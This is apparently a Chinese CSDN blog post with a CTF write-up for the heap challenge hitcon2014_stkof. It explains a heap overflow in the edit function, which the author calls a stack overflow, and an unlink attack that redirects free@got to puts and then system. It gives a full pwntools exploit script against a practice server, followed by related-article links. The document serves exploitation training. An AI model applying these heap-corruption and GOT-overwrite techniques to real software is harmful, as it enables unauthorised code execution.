hitcon2014_stkof

于 2023-02-22 16:39:10 发布
阅读量154 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129165598
版权

hitcon2014_stkof

首先惯例先chekcsec一下 开启了nx和canary的64为程序 放进ida64里看看

请添加图片描述

当输入1时添加堆 输入2时编辑堆 输入3时释放堆

请添加图片描述

1 添加堆

在bss段的dword上存储申请到的chunk的地址

请添加图片描述

2 编辑堆

注意 此处的编辑堆 由于长度时有我们自己控制的所以此处存在栈溢出漏洞。

请添加图片描述

3释放堆

标准的释放堆的过程不存在uaf漏洞

请添加图片描述

4没啥用 这里就粗放出来了

请添加图片描述

edit函数存在栈溢出漏洞因此我们次吃可以利用unlink的操作来帮助我们获取flag

首先我们先add3个chunk并利用gdb找出他们存储的位置以及chunk地址在bss段上的地址

然后我们利用栈溢出漏洞修改chunk2的内容并在其中构造一个已经被free掉的fakechunk

具体操作流程:先构造fakechunk并将其fd指向ptr-0x18 bk指向ptr-0x10 然后将chunk3的prevsize篡改为0x20(即可用空间0x10) size篡改为0x90

然后free掉chunk3实现unlink操作

从而实现令bss段上原本存储chunk2地址的位置存储了该地址-0x18的地址达到我们编辑chunk2上的内容实际是修改bss段上的内容实现进而将chunk1的地址篡改为free.got以及chunk3的地址篡改为puts.got然后编辑chunk1的内容(即编辑free.got的内容将其改为puts.plt)达到将free函数篡改为puts函数的功能

delete(3)获得puts_addr进而得到libc

然后同理将free函数改为system函数

然后将bss段上存储chunk3的地址的位置改为ptr+0x10再在该处填上“/bin/sh”然后delete(3)(实际上是执行system(bin\sh))

exp:

from pwn import *
from LibcSearcher import *
gdb.attach
#io=process('./stkof')
io=remote('node4.buuoj.cn',25605)
elf=ELF('./stkof')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
free=elf.got['free']
def add(size):
    io.sendline('1')
    io.sendline(str(size))
    io.recvuntil('OK\n')

def edit(idx,size,content):
    io.sendline('2')
    io.sendline(str(idx))
    io.sendline(str(size))
    io.send(content)
    io.recvuntil('OK\n')

def delete(idx):
    io.sendline('3')
    io.sendline(str(idx))

add(0x100)
add(0x20)
add(0x80)
ptr=0x602150
payload=p64(0)+p64(0x21)+p64(ptr-0x18)+p64(ptr-0x10)+p64(0x20)+p64(0x90)
edit(2,len(payload),payload)
delete(3)
io.recvuntil('OK')

payload=p64(0)+p64(0)+p64(free)+p64(ptr-0x18)+p64(puts_got)
edit(2,len(payload),payload)
edit(1,8,p64(puts_plt))
delete(3)

puts_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
base=puts_addr-libc.dump('puts')
io.recvuntil('OK')
system_addr=base+libc.dump('system')
payload=p64(0)+p64(0)+p64(free)+p64(ptr-0x18)+p64(ptr+0x10)+"/bin/sh"
edit(2,len(payload),payload)
edit(1,8,p64(system_addr))
delete(3)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1600
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
2014_hitcon_stkof学习
a2590035252的博客
08-29 934
适用于和我一样的广大pwn菜鸡
2014_hitcon_stkof
Maxmalloc的博客
12-13 846
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 752
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
HITCON 2014 pwn - stkof 做题笔记
fa1c4的blog
08-30 435
前言 一道unlink + off-by-one, ctfhub 搜 stkof 分析过程 __int64 __fastcall main(int a1, char **a2, char **a3) { int v3; // eax int v5; // [rsp+Ch] [rbp-74h] char nptr[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v7; // [rsp+78h] [rbp-8h] v7 = __re
unlink 2014 HITCON stkof
qq_36918532的博客
01-17 2549
题目可以从buuctf下载 参考链接有两篇:一篇使我们的靶场里面的内网服务器的文章链接就不贴了:他所使用的原理是通过atoi函数来达到获取shell的,另外一篇通过free-》system https://blog.csdn.net/Pwnpanda/article/details/81369367 首先拿到题目,随便输入发现没有任何提示,,,,在IDA里面仔细看了看,大概看出来 1.用来分配 2用来写入内容 3.用来free 4.好像没什么用 而且发现在输入的时候是没有验证大小的,可以随便输入所以就可以
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 674
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
2014 HITCON CTF stkof
Bill
03-16 2869
2014 HITCON CTF stkof 1.序言 接着how2heap的教程走,下面是unlink漏洞的利用及相关练习。 有关漏洞的原理,网上已经有很多说明了,在这里我给出一些比较靠谱一点的链接: CTF WiKi 堆溢出之unlink的利用-Yun Unlink Exploit Linux堆溢出漏洞利用之unlink 堆溢出的unlink利用方法 2.程序分析 ...
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 808
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2160
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
unlink小结 && 2014_hitcon_stkof
Pwnpanda的博客
08-02 1340
暑假学习计划 - 0x02 关于unlink的学习资料以及本例题的wp都很多,本篇主要是做个小总结,内附较为详细的调试图片以便初学者理解 (自从入了堆坑学unlink,到现在差不多一个半月了,真的是死去活来,也怪自己的基础差,现在算是理解一些了,先记下来等以后深入理解后再补充,在此感谢各位师傅的帮助,尤其是kaka师傅) 先放基础学习链接: Linux堆溢出漏洞利用之unlink http...
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 668
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值